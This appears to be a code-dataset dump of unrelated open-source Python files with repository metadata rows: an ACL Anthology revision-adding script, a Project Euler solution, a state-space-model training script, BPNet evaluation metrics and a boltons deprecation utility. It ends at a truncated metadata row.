#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Used to add revisions to the Anthology.
Assumes all files have a base format like ANTHOLOGY_ROOT/P/P18/P18-1234.pdf format.
The revision process is as follows.
- The original paper is named as above.
- When a first revision is created, the original paper is archived to PYY-XXXXv1.pdf.
- The new revision is copied to PYY-XXXXvN, where N is the next revision ID (usually 2).
The new revision is also copied to PYY-XXXX.pdf.
This causes it to be returned by the anthology when the base paper format is queried.
Usage:
add_revision.py [-e] paper_id URL_OR_PATH.pdf "Short explanation".
`-e` denotes erratum instead of revision.
By default, a dry run happens.
When you are ready, add `--do`.
"""
import argparse
import filetype
import os
import shutil
import ssl
import sys
import tempfile
from anthology.utils import (
deconstruct_anthology_id,
make_simple_element,
indent,
compute_hash_from_file,
infer_url,
is_newstyle_id,
retrieve_url,
get_pdf_dir,
get_xml_file,
)
from anthology.data import (
PDF_LOCATION_TEMPLATE,
ANTHOLOGY_FILE_DIR,
)
import lxml.etree as ET
import urllib.request
from datetime import datetime
def validate_file_type(path):
"""Ensure downloaded file mime type matches its extension (e.g., PDF)"""
detected = filetype.guess(path)
if detected is None or not detected.mime.endswith(detected.extension):
mime_type = 'UNKNOWN' if detected is None else detected.mime
print(
f"FATAL: file {path} has MIME type {mime_type}",
file=sys.stderr,
)
sys.exit(1)
def add_revision(
anth_id, pdf_path, explanation, change_type="revision", dry_run=True, date=None
):
"""
Takes an Anthology ID. It then adds a revision to the Anthology XML,
updating and writing the XML file, and copies the PDFs into place.
For PDFs, the revised PDF is saved to {anth_id}.pdf and {anth_id}v{version}.pdf.
For the first revision, we first copy {anth_id}.pdf to {anth_id}v1.pdf.
"""
if date is None:
now = datetime.now()
date = f"{now.year}-{now.month:02d}-{now.day:02d}"
def maybe_copy(file_from, file_to):
if not dry_run:
print("-> Copying from {} -> {}".format(file_from, file_to), file=sys.stderr)
shutil.copy(file_from, file_to)
os.chmod(file_to, 0o644)
else:
print(
"-> DRY RUN: Copying from {} -> {}".format(file_from, file_to),
file=sys.stderr,
)
# The new version
revno = None
change_letter = "e" if change_type == "erratum" else "v"
checksum = compute_hash_from_file(pdf_path)
# Files for old-style IDs are stored under anthology-files/pdf/P/P19/*
# Files for new-style IDs are stored under anthology-files/pdf/2020.acl/*
output_dir = get_pdf_dir(anth_id)
# Make sure directory exists
if not os.path.exists(output_dir):
print(f"-> Creating directory {output_dir}", file=sys.stderr)
os.makedirs(output_dir)
canonical_path = os.path.join(output_dir, f"{anth_id}.pdf")
# Update XML
xml_file = get_xml_file(anth_id)
collection_id, volume_id, paper_id = deconstruct_anthology_id(anth_id)
tree = ET.parse(xml_file)
if paper_id == "0":
paper = tree.getroot().find(f"./volume[@id='{volume_id}']/frontmatter")
else:
paper = tree.getroot().find(
f"./volume[@id='{volume_id}']/paper[@id='{paper_id}']"
)
if paper is not None:
revisions = paper.findall(change_type)
revno = 1 if change_type == "erratum" else 2
for revision in revisions:
revno = int(revision.attrib["id"]) + 1
if not dry_run:
# Update the URL hash on the <url> tag
url = paper.find("./url")
if url is not None:
url.attrib["hash"] = checksum
if change_type == "revision" and revno == 2:
if paper.find("./url") is not None:
current_version_url = infer_url(paper.find("./url").text) + ".pdf"
# Download original file
# There are no versioned files the first time around, so create the first one
# (essentially backing up the original version)
revised_file_v1_path = os.path.join(
output_dir, f"{anth_id}{change_letter}1.pdf"
)
retrieve_url(current_version_url, revised_file_v1_path)
validate_file_type(revised_file_v1_path)
old_checksum = compute_hash_from_file(revised_file_v1_path)
# First revision requires making the original version explicit
revision = make_simple_element(
change_type,
None,
attrib={
"id": "1",
"href": f"{anth_id}{change_letter}1",
"hash": old_checksum,
},
parent=paper,
)
revision = make_simple_element(
change_type,
explanation,
attrib={
"id": str(revno),
"href": f"{anth_id}{change_letter}{revno}",
"hash": checksum,
"date": date,
},
parent=paper,
)
indent(tree.getroot())
tree.write(xml_file, encoding="UTF-8", xml_declaration=True)
print(
f'-> Added {change_type} node "{revision.text}" to XML', file=sys.stderr
)
else:
print(
f"-> FATAL: paper ID {anth_id} not found in the Anthology",
file=sys.stderr,
)
sys.exit(1)
revised_file_versioned_path = os.path.join(
output_dir, f"{anth_id}{change_letter}{revno}.pdf"
)
# Copy the file to the versioned path
maybe_copy(pdf_path, revised_file_versioned_path)
# Copy it over the canonical path
if change_type == "revision":
maybe_copy(pdf_path, canonical_path)
def main(args):
change_type = "erratum" if args.erratum else "revision"
print(f"Processing {change_type} to {args.anthology_id}...")
# TODO: make sure path exists, or download URL to temp file
if args.path.startswith("http"):
_, input_file_path = tempfile.mkstemp()
retrieve_url(args.path, input_file_path)
else:
input_file_path = args.path
validate_file_type(input_file_path)
add_revision(
args.anthology_id,
input_file_path,
args.explanation,
change_type=change_type,
dry_run=args.dry_run,
)
if args.path.startswith("http"):
os.remove(input_file_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"anthology_id", help="The Anthology paper ID to revise (e.g., P18-1001)"
)
parser.add_argument(
"path", type=str, help="Path to the revised paper ID (can be URL)"
)
parser.add_argument("explanation", help="Brief description of the changes.")
parser.add_argument(
"--erratum",
"-e",
action="store_true",
help="This is an erratum instead of a revision.",
)
now = datetime.now()
today = f"{now.year}-{now.month:02d}-{now.day:02d}"
parser.add_argument(
"--date",
"-d",
type=str,
default=today,
help="The date of the revision (ISO 8601 format)",
)
parser.add_argument(
"--dry-run", "-n", action="store_true", default=False, help="Just a dry run."
)
args = parser.parse_args()
main(args)
| 31.716981 | 93 | 0.612731 |
795471a47a4c337a042a18e73f2bfabcc488d758 | 1,116 | py | Python | project_euler/python/179.py | hacktoolkit/code_challenges | d71f8362496a72963a53abba7bcc9dd4d35a2920 | [
"MIT"
] | 10 | 2015-01-31T09:04:45.000Z | 2022-01-08T04:09:48.000Z | project_euler/python/179.py | hacktoolkit/code_challenges | d71f8362496a72963a53abba7bcc9dd4d35a2920 | [
"MIT"
] | 3 | 2016-05-16T07:37:01.000Z | 2016-05-18T14:14:16.000Z | project_euler/python/179.py | hacktoolkit/code_challenges | d71f8362496a72963a53abba7bcc9dd4d35a2920 | [
"MIT"
] | 6 | 2015-02-06T06:00:00.000Z | 2020-02-13T16:13:48.000Z | """
http://projecteuler.net/problem=179
Consecutive positive divisors
Find the number of integers 1 < n < 10^7, for which n and n + 1 have the same number of positive divisors. For example, 14 has the positive divisors 1, 2, 7, 14 while 15 has 1, 3, 5, 15.
Solution by jontsai <hello@jontsai.com>
"""
from utils import *
class Solution(object):
TARGET = 16
EXPECTED_ANSWER = 2
# TARGET = 10**7
# EXPECTED_ANSWER = 0
def __init__(self):
pass
def solve(self):
count = 0
prev_num_divisors = None
for n in xrange(2, Solution.TARGET):
if n % 1000 == 0:
print n
divisors = get_divisors(n)
num_divisors = len(divisors)
if prev_num_divisors is not None and prev_num_divisors == num_divisors:
count += 1
prev_num_divisors = num_divisors
answer = count
return answer
def main():
solution = Solution()
answer = solution.solve()
print 'Expected: %s, Answer: %s' % (Solution.EXPECTED_ANSWER, answer)
if __name__ == '__main__':
main()
| 22.77551 | 186 | 0.606631 |
7954729660e749e8c7452ff3c5bc8a3176146388 | 1,611 | py | Python | run/run_robomove.py | silvanmelchior/CBF-SSM | 34a5300f4b9a58e945c04d6c85f6e649ec63e609 | [
"Apache-2.0",
"MIT"
] | 7 | 2019-08-02T17:08:39.000Z | 2021-10-06T07:52:28.000Z | run/run_robomove.py | silvanmelchior/CBF-SSM | 34a5300f4b9a58e945c04d6c85f6e649ec63e609 | [
"Apache-2.0",
"MIT"
] | 4 | 2020-01-28T22:50:40.000Z | 2021-08-25T15:39:34.000Z | run/run_robomove.py | silvanmelchior/CBF-SSM | 34a5300f4b9a58e945c04d6c85f6e649ec63e609 | [
"Apache-2.0",
"MIT"
] | null | null | null | import numpy as np
from cbfssm.datasets import RoboMove
from cbfssm.training import Trainer
from cbfssm.outputs import OutputsRoboMove
from cbfssm.model import CBFSSM
# curriculum learning scheme presented in appendix
# first train w/o entropy, then add it
for phase in range(2):
#
# Config
#
root_dir = "run_output/robomove"
# dataset
ds_sel = RoboMove
seq_len = 300
seq_stride = 50
# model
model_sel = CBFSSM
dim_x = 4
model_config = {
# dataset
'ds': ds_sel,
'batch_size': 32,
'shuffle': 10000,
# method
'dim_x': dim_x,
'ind_pnt_num': 100,
'samples': 50,
'learning_rate': 0.01,
'loss_factors': np.asarray([20., 2. * (phase == 1)]),
'k_factor': 1.,
'recog_len': 50,
# variables init state
'zeta_pos': 2.,
'zeta_mean': 0.1 ** 2,
'zeta_var': 0.01 ** 2,
'var_x': np.asarray([0.1 ** 2] * dim_x),
'var_y': np.asarray([1. ** 2] * dim_x),
'gp_var': 0.1 ** 2,
'gp_len': 1.
}
# training
train = True
retrain = (phase == 1)
epochs = 100
# evaluation
output_sel = OutputsRoboMove
#
# Run
#
# load
outputs = output_sel(root_dir)
ds = ds_sel(seq_len, seq_stride)
outputs.set_ds(ds)
model = model_sel(model_config)
outputs.set_model(model, root_dir)
# train
if train:
trainer = Trainer(model, root_dir)
trainer.train(ds, epochs, retrain=retrain)
outputs.set_trainer(trainer)
# evaluate
outputs.create_all()
| 23.691176 | 61 | 0.571695 |
795472ef2f4cc97e2262386f93ca8ca3420c8b7f | 187 | py | Python | 1stSemester_PythonCourse/work7/E01_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | 1stSemester_PythonCourse/work7/E01_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | 1stSemester_PythonCourse/work7/E01_1827406005.py | chenyz2000/schoolCourses | cca7f25b0f44186e0c248b26b5d7ed2bcb23c630 | [
"MIT"
] | null | null | null | def func1(s):
if len(s) < 2:
return ''
else:
return s[:2] + s[-2:]
if __name__=="__main__":
print(func1("python"))
print(func1("py"))
print(func1("p")) | 20.777778 | 29 | 0.497326 |
795473ef8c0dfe7722973dc8cfed86ac2c8e50e6 | 19,917 | py | Python | bpnet/metrics.py | mlweilert/bpnet | dcc9e8d805f9de774ae9dcc62c20504915be614f | [
"MIT"
] | 93 | 2019-08-15T19:49:19.000Z | 2022-03-04T08:23:44.000Z | bpnet/metrics.py | mlweilert/bpnet | dcc9e8d805f9de774ae9dcc62c20504915be614f | [
"MIT"
] | 29 | 2019-08-15T15:44:44.000Z | 2022-03-28T06:56:07.000Z | bpnet/metrics.py | mlweilert/bpnet | dcc9e8d805f9de774ae9dcc62c20504915be614f | [
"MIT"
] | 24 | 2019-08-29T18:54:36.000Z | 2022-03-23T21:04:46.000Z | import sklearn.metrics as skm
import logging
import matplotlib.pyplot as plt
from bpnet.utils import read_pkl
from keras.models import load_model
from bpnet.utils import _listify, create_tf_session
from bpnet.stats import permute_array
from bpnet.functions import softmax, mean
import os
import json
from tqdm import tqdm
import matplotlib
import pandas as pd
import numpy as np
from collections import OrderedDict
import gin
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
# Metric helpers
def average_profile(pe):
tasks = list(pe)
binsizes = list(pe[tasks[0]])
return {binsize: {"auprc": mean([pe[task][binsize]['auprc'] for task in tasks])}
for binsize in binsizes}
def average_counts(pe):
tasks = list(pe)
metrics = list(pe[tasks[0]])
return {metric: mean([pe[task][metric] for task in tasks])
for metric in metrics}
def bin_counts_max(x, binsize=2):
"""Bin the counts
"""
if binsize == 1:
return x
assert len(x.shape) == 3
outlen = x.shape[1] // binsize
xout = np.zeros((x.shape[0], outlen, x.shape[2]))
for i in range(outlen):
xout[:, i, :] = x[:, (binsize * i):(binsize * (i + 1)), :].max(1)
return xout
def bin_counts_amb(x, binsize=2):
"""Bin the counts
"""
if binsize == 1:
return x
assert len(x.shape) == 3
outlen = x.shape[1] // binsize
xout = np.zeros((x.shape[0], outlen, x.shape[2])).astype(float)
for i in range(outlen):
iterval = x[:, (binsize * i):(binsize * (i + 1)), :]
has_amb = np.any(iterval == -1, axis=1)
has_peak = np.any(iterval == 1, axis=1)
# if no peak and has_amb -> -1
# if no peak and no has_amb -> 0
# if peak -> 1
xout[:, i, :] = (has_peak - (1 - has_peak) * has_amb).astype(float)
return xout
def bin_counts_summary(x, binsize=2, fn=np.max):
"""Bin the counts
"""
if binsize == 1:
return x
assert len(x.shape) == 3
outlen = x.shape[1] // binsize
xout = np.zeros((x.shape[0], outlen, x.shape[2]))
for i in range(outlen):
xout[:, i, :] = np.apply_along_axis(fn, 1, x[:, (binsize * i):(binsize * (i + 1)), :])
return xout
def eval_profile(yt, yp,
pos_min_threshold=0.05,
neg_max_threshold=0.01,
required_min_pos_counts=2.5,
binsizes=[1, 2, 4, 10]):
"""
Evaluate the profile in terms of auPR
Args:
yt: true profile (counts)
yp: predicted profile (fractions)
pos_min_threshold: fraction threshold above which the position is
considered to be a positive
neg_max_threshold: fraction threshold bellow which the position is
considered to be a negative
required_min_pos_counts: smallest number of reads the peak should be
supported by. All regions where 0.05 of the total reads would be
less than required_min_pos_counts are excluded
"""
# The filtering
# criterion assures that each position in the positive class is
# supported by at least required_min_pos_counts of reads
do_eval = yt.sum(axis=1).mean(axis=1) > required_min_pos_counts / pos_min_threshold
# make sure everything sums to one
yp = yp / yp.sum(axis=1, keepdims=True)
fracs = yt / yt.sum(axis=1, keepdims=True)
yp_random = permute_array(permute_array(yp[do_eval], axis=1), axis=0)
out = []
for binsize in binsizes:
is_peak = (fracs >= pos_min_threshold).astype(float)
ambigous = (fracs < pos_min_threshold) & (fracs >= neg_max_threshold)
is_peak[ambigous] = -1
y_true = np.ravel(bin_counts_amb(is_peak[do_eval], binsize))
imbalance = np.sum(y_true == 1) / np.sum(y_true >= 0)
n_positives = np.sum(y_true == 1)
n_ambigous = np.sum(y_true == -1)
frac_ambigous = n_ambigous / y_true.size
# TODO - I used to have bin_counts_max over here instead of bin_counts_sum
try:
res = auprc(y_true,
np.ravel(bin_counts_max(yp[do_eval], binsize)))
res_random = auprc(y_true,
np.ravel(bin_counts_max(yp_random, binsize)))
except Exception:
res = np.nan
res_random = np.nan
out.append({"binsize": binsize,
"auprc": res,
"random_auprc": res_random,
"n_positives": n_positives,
"frac_ambigous": frac_ambigous,
"imbalance": imbalance
})
return pd.DataFrame.from_dict(out)
# --------------------------------------------
@gin.configurable
class BPNetSeparatePostproc:
def __init__(self, tasks):
self.tasks = tasks
def __call__(self, y_true, preds):
profile_preds = {task: softmax(preds[task_i])
for task_i, task in enumerate(self.tasks)}
count_preds = {task: preds[len(self.tasks) + task_i].sum(axis=-1)
for task_i, task in enumerate(self.tasks)}
profile_true = {task: y_true[f'profile/{task}']
for task in self.tasks}
counts_true = {task: y_true[f'counts/{task}'].sum(axis=-1)
for task in self.tasks}
return ({"profile": profile_true, "counts": counts_true},
{"profile": profile_preds, "counts": count_preds})
@gin.configurable
class BPNetSinglePostproc:
"""Example where we predict a single track
"""
def __init__(self, tasks):
self.tasks = tasks
def __call__(self, y_true, preds):
profile_preds = {task: preds[task_i] / preds[task_i].sum(axis=-2, keepdims=True)
for task_i, task in enumerate(self.tasks)}
count_preds = {task: np.log(1 + preds[task_i].sum(axis=(-2, -1)))
for task_i, task in enumerate(self.tasks)}
profile_true = {task: y_true[f'profile/{task}']
for task in self.tasks}
counts_true = {task: np.log(1 + y_true[f'profile/{task}'].sum(axis=(-2, -1)))
for task in self.tasks}
return ({"profile": profile_true, "counts": counts_true},
{"profile": profile_preds, "counts": count_preds})
@gin.configurable
class BPNetMetric:
"""BPNet metrics when the net is predicting counts and profile separately
"""
def __init__(self, tasks, count_metric,
profile_metric=None,
postproc_fn=None):
"""
Args:
tasks: tasks
count_metric: count evaluation metric
profile_metric: profile evaluation metric
"""
self.tasks = tasks
self.count_metric = count_metric
self.profile_metric = profile_metric
if postproc_fn is None:
self.postproc_fn = BPNetSeparatePostproc(tasks=self.tasks)
else:
self.postproc_fn = postproc_fn
def __call__(self, y_true, preds):
# extract the profile and count predictions
y_true, preds = self.postproc_fn(y_true, preds)
out = {}
out["counts"] = {task: self.count_metric(y_true['counts'][task],
preds['counts'][task])
for task in self.tasks}
out["counts"]['avg'] = average_counts(out["counts"])
out["avg"] = {"counts": out["counts"]['avg']} # new system compatibility
if self.profile_metric is not None:
out["profile"] = {task: self.profile_metric(y_true['profile'][task],
preds['profile'][task])
for task in self.tasks}
out["profile"]['avg'] = average_profile(out["profile"])
out["avg"]['profile'] = out["profile"]['avg']
return out
@gin.configurable
class BPNetMetricSingleProfile:
"""BPNet metrics when the net is predicting the total counts + profile at the same time
"""
def __init__(self, count_metric,
profile_metric=None):
"""
Args:
tasks: tasks
count_metric: count evaluation metric
profile_metric: profile evaluation metric
"""
# self.tasks = tasks
self.count_metric = count_metric
self.profile_metric = profile_metric
def __call__(self, y_true, preds):
# extract the profile and count predictions
out = {}
# sum across positions + strands
out["counts"] = self.count_metric(np.log(1 + y_true.sum(axis=(-2, -1))),
np.log(1 + preds.sum(axis=(-2, -1))))
if self.profile_metric is not None:
out["profile"] = self.profile_metric(y_true, preds)
return out
@gin.configurable
class PeakPredictionProfileMetric:
def __init__(self, pos_min_threshold=0.05,
neg_max_threshold=0.01,
required_min_pos_counts=2.5,
binsizes=[1, 10]):
self.pos_min_threshold = pos_min_threshold
self.neg_max_threshold = neg_max_threshold
self.required_min_pos_counts = required_min_pos_counts
self.binsizes = binsizes
def __call__(self, y_true, y_pred):
out = eval_profile(y_true, y_pred,
pos_min_threshold=self.pos_min_threshold,
neg_max_threshold=self.neg_max_threshold,
required_min_pos_counts=self.required_min_pos_counts,
binsizes=self.binsizes)
return {f"binsize={k}": v for k, v in out.set_index("binsize").to_dict("index").items()}
default_peak_pred_metric = PeakPredictionProfileMetric(pos_min_threshold=0.015,
neg_max_threshold=0.005,
required_min_pos_counts=2.5,
binsizes=[1, 10])
# --------------------------------------------
# Combined metrics
@gin.configurable
class BootstrapMetric:
def __init__(self, metric, n):
"""
Args:
metric: a function accepting (y_true and y_pred) and
returning the evaluation result
n: number of bootstrap samples to draw
"""
self.metric = metric
self.n = n
def __call__(self, y_true, y_pred):
outl = []
for i in range(self.n):
bsamples = (
pd.Series(np.arange(len(y_true))).sample(frac=1, replace=True).values
)
outl.append(self.metric(y_true[bsamples], y_pred[bsamples]))
return outl
@gin.configurable
class MetricsList:
"""Wraps a list of metrics into a single metric returning a list"""
def __init__(self, metrics):
self.metrics = metrics
def __call__(self, y_true, y_pred):
return [metric(y_true, y_pred) for metric in self.metrics]
@gin.configurable
class MetricsDict:
"""Wraps a dictionary of metrics into a single metric returning a dictionary"""
def __init__(self, metrics):
self.metrics = metrics
def __call__(self, y_true, y_pred):
return {k: metric(y_true, y_pred) for k, metric in self.metrics.items()}
@gin.configurable
class MetricsTupleList:
"""Wraps a dictionary of metrics into a single metric returning a dictionary"""
def __init__(self, metrics):
self.metrics = metrics
def __call__(self, y_true, y_pred):
return [(k, metric(y_true, y_pred)) for k, metric in self.metrics]
@gin.configurable
class MetricsOrderedDict:
"""Wraps a OrderedDict/tuple list of metrics into a single metric
returning an OrderedDict
"""
def __init__(self, metrics):
self.metrics = metrics
def __call__(self, y_true, y_pred):
return OrderedDict([(k, metric(y_true, y_pred)) for k, metric in self.metrics])
@gin.configurable
class MetricsMultiTask:
"""Run the same metric across multiple tasks
"""
def __init__(self, metrics, task_names=None):
self.metrics = metrics
self.task_names = task_names
def __call__(self, y_true, y_pred):
n_tasks = y_true.shape[1]
if self.task_names is None:
self.task_names = [i for i in range(n_tasks)]
else:
assert len(self.task_names) == n_tasks
return OrderedDict([(task, self.metrics(y_true[:, i], y_pred[:, i]))
for i, task in enumerate(self.task_names)])
@gin.configurable
class MetricsAggregated:
def __init__(self,
metrics,
agg_fn={"mean": np.mean, "std": np.std},
prefix=""):
self.metrics
self.agg_fn = agg_fn
self.prefix = prefix
def __call__(self, y_true, y_pred):
out = self.metrics(y_true, y_pred)
# TODO - generalize using numpy_collate?
m = np.array(list(out.values()))
return {self.prefix + k: fn(m) for k, fn in self.agg_fn}
@gin.configurable
class MetricsConcise:
def __init__(self, metrics):
import concise
self.metrics_dict = OrderedDict([(m, concise.eval_metrics.get(m))
for m in metrics])
def __call__(self, y_true, y_pred):
return OrderedDict([(m, fn(y_true, y_pred))
for m, fn in self.metrics_dict.items()])
# -----------------------------
# Binary classification
# Metric helpers
MASK_VALUE = -1
# Binary classification
def _mask_nan(y_true, y_pred):
mask_array = ~np.isnan(y_true)
if np.any(np.isnan(y_pred)):
print("WARNING: y_pred contains {0}/{1} np.nan values. removing them...".
format(np.sum(np.isnan(y_pred)), y_pred.size))
mask_array = np.logical_and(mask_array, ~np.isnan(y_pred))
return y_true[mask_array], y_pred[mask_array]
def _mask_value(y_true, y_pred, mask=MASK_VALUE):
mask_array = y_true != mask
return y_true[mask_array], y_pred[mask_array]
def _mask_value_nan(y_true, y_pred, mask=MASK_VALUE):
y_true, y_pred = _mask_nan(y_true, y_pred)
return _mask_value(y_true, y_pred, mask)
@gin.configurable
def n_positive(y_true, y_pred):
return y_true.sum()
@gin.configurable
def n_negative(y_true, y_pred):
return (1 - y_true).sum()
@gin.configurable
def frac_positive(y_true, y_pred):
return y_true.mean()
@gin.configurable
def accuracy(y_true, y_pred, round=True):
"""Classification accuracy
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = np.round(y_true)
y_pred = np.round(y_pred)
return skm.accuracy_score(y_true, y_pred)
@gin.configurable
def auc(y_true, y_pred, round=True):
"""Area under the ROC curve
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = y_true.round()
if len(y_true) == 0 or len(np.unique(y_true)) < 2:
return np.nan
return skm.roc_auc_score(y_true, y_pred)
@gin.configurable
def auprc(y_true, y_pred):
"""Area under the precision-recall curve
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
return skm.average_precision_score(y_true, y_pred)
@gin.configurable
def mcc(y_true, y_pred, round=True):
"""Matthews correlation coefficient
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = np.round(y_true)
y_pred = np.round(y_pred)
return skm.matthews_corrcoef(y_true, y_pred)
@gin.configurable
def f1(y_true, y_pred, round=True):
"""F1 score: `2 * (p * r) / (p + r)`, where p=precision and r=recall.
"""
y_true, y_pred = _mask_value_nan(y_true, y_pred)
if round:
y_true = np.round(y_true)
y_pred = np.round(y_pred)
return skm.f1_score(y_true, y_pred)
@gin.configurable
def cat_acc(y_true, y_pred):
"""Categorical accuracy
"""
return np.mean(y_true.argmax(axis=1) == y_pred.argmax(axis=1))
classification_metrics = [
("auPR", auprc),
("auROC", auc),
("accuracy", accuracy),
("n_positive", n_positive),
("n_negative", n_negative),
("frac_positive", frac_positive),
]
@gin.configurable
class ClassificationMetrics:
"""All classification metrics
"""
cls_metrics = classification_metrics
def __init__(self):
self.classification_metric = MetricsOrderedDict(self.cls_metrics)
def __call__(self, y_true, y_pred):
return self.classification_metric(y_true, y_pred)
# TODO - add gin macro for a standard set of classification and regession metrics
# --------------------------------------------
# Regression
@gin.configurable
def cor(y_true, y_pred):
"""Compute Pearson correlation coefficient.
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
return np.corrcoef(y_true, y_pred)[0, 1]
@gin.configurable
def kendall(y_true, y_pred, nb_sample=100000):
"""Kendall's tau coefficient, Kendall rank correlation coefficient
"""
from scipy.stats import kendalltau
y_true, y_pred = _mask_nan(y_true, y_pred)
if len(y_true) > nb_sample:
idx = np.arange(len(y_true))
np.random.shuffle(idx)
idx = idx[:nb_sample]
y_true = y_true[idx]
y_pred = y_pred[idx]
return kendalltau(y_true, y_pred)[0]
@gin.configurable
def mad(y_true, y_pred):
"""Median absolute deviation
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
return np.mean(np.abs(y_true - y_pred))
@gin.configurable
def rmse(y_true, y_pred):
"""Root mean-squared error
"""
return np.sqrt(mse(y_true, y_pred))
@gin.configurable
def rrmse(y_true, y_pred):
"""1 - rmse
"""
return 1 - rmse(y_true, y_pred)
@gin.configurable
def mse(y_true, y_pred):
"""Mean squared error
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
return ((y_true - y_pred) ** 2).mean(axis=None)
@gin.configurable
def ermse(y_true, y_pred):
"""Exponentiated root-mean-squared error
"""
return 10**np.sqrt(mse(y_true, y_pred))
@gin.configurable
def var_explained(y_true, y_pred):
"""Fraction of variance explained.
"""
y_true, y_pred = _mask_nan(y_true, y_pred)
var_resid = np.var(y_true - y_pred)
var_y_true = np.var(y_true)
return 1 - var_resid / var_y_true
@gin.configurable
def pearsonr(y_true, y_pred):
from scipy.stats import pearsonr
y_true, y_pred = _mask_nan(y_true, y_pred)
return pearsonr(y_true, y_pred)[0]
@gin.configurable
def spearmanr(y_true, y_pred):
from scipy.stats import spearmanr
y_true, y_pred = _mask_nan(y_true, y_pred)
return spearmanr(y_true, y_pred)[0]
@gin.configurable
def pearson_spearman(yt, yp):
return {"pearsonr": pearsonr(yt, yp),
"spearmanr": spearmanr(yt, yp)}
regression_metrics = [
("mse", mse),
("var_explained", var_explained),
("pearsonr", pearsonr), # pearson and spearman correlation
("spearmanr", spearmanr),
("mad", mad), # median absolute deviation
]
@gin.configurable
class RegressionMetrics:
"""All classification metrics
"""
cls_metrics = regression_metrics
def __init__(self):
self.regression_metric = MetricsOrderedDict(self.cls_metrics)
def __call__(self, y_true, y_pred):
# squeeze the last dimension
if y_true.ndim == 2 and y_true.shape[1] == 1:
y_true = np.ravel(y_true)
if y_pred.ndim == 2 and y_pred.shape[1] == 1:
y_pred = np.ravel(y_pred)
return self.regression_metric(y_true, y_pred)
# available eval metrics --------------------------------------------
BINARY_CLASS = ["auc", "auprc", "accuracy", "tpr", "tnr", "f1", "mcc"]
CATEGORY_CLASS = ["cat_acc"]
REGRESSION = ["mse", "mad", "cor", "ermse", "var_explained"]
AVAILABLE = BINARY_CLASS + CATEGORY_CLASS + REGRESSION
| 29.7713 | 96 | 0.609279 |
795473f6eecddf8eaa697c39175e4c412b8a0c6a | 2,711 | py | Python | src/utsc/core/_vendor/boltons/deprutils.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | src/utsc/core/_vendor/boltons/deprutils.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | src/utsc/core/_vendor/boltons/deprutils.py | utsc-networking/utsc-tools | d5bc10cf825f1be46999d5a42da62cc0df456f0c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (c) 2013, Mahmoud Hashemi
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * The names of the contributors may not be used to endorse or
# promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
Note that DeprecationWarnings are ignored by default in Python
2.7/3.2+, so be sure to either un-ignore them in your code, or run
Python with the -Wd flag.
"""
import sys
from warnings import warn
ModuleType = type(sys)
# todo: only warn once
class DeprecatableModule(ModuleType):
def __init__(self, module):
name = module.__name__
super(DeprecatableModule, self).__init__(name=name)
self.__dict__.update(module.__dict__)
def __getattribute__(self, name):
get_attribute = super(DeprecatableModule, self).__getattribute__
try:
depros = get_attribute("_deprecated_members")
except AttributeError:
self._deprecated_members = depros = {}
ret = get_attribute(name)
message = depros.get(name)
if message is not None:
warn(message, DeprecationWarning, stacklevel=2)
return ret
def deprecate_module_member(mod_name, name, message):
module = sys.modules[mod_name]
if not isinstance(module, DeprecatableModule):
sys.modules[mod_name] = module = DeprecatableModule(module)
module._deprecated_members[name] = message
return
| 37.136986 | 72 | 0.729989 |
795474c5186cff30ef63f8a6d5bf537a367490c3 | 492 | py | Python | pktfwd/config/region_config_filenames.py | KevinWassermann94/hm-pktfwd | 57f52a507759c57a4fe0a6baeb315cf3cb9e668f | [
"MIT"
] | null | null | null | pktfwd/config/region_config_filenames.py | KevinWassermann94/hm-pktfwd | 57f52a507759c57a4fe0a6baeb315cf3cb9e668f | [
"MIT"
